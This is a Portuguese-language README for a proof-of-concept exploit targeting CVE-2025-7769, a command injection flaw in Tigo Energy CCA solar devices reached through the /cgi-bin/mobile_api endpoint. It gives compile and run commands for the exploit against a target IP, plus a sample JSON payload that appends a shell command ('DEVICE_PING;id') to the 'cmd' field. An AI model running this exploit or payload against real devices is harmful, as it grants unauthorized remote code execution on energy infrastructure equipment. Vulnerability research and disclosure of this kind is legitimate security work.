
PoC para injetar um comando através do endpoint DEVICE_PING
Este repositório contém um exploit de Prova‑de‑Conceito (PoC) para CVE‑2025‑7769, uma vulnerabilidade crítica de Injeção Remota de Comandos encontrada em dispositivos Tigo Energy CCA que expõem o endpoint /cgi-bin/mobile_api.
A vulnerabilidade é acionada ao injetar comandos do SO através da chave JSON cmd, onde a entrada não filtrada é concatenada diretamente em uma chamada de sistema, permitindo a execução remota completa de código (RCE) no dispositivo.
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
Substitua 10.0.2.15 pelo IP alvo.
Use -u http://target.com se quiser passar uma URL base completa em vez de IP/porta.
Exemplo de Payload :
{
"cmd": "DEVICE_PING;id",
"dev": 2,
"ver": 1
}
Licença MIT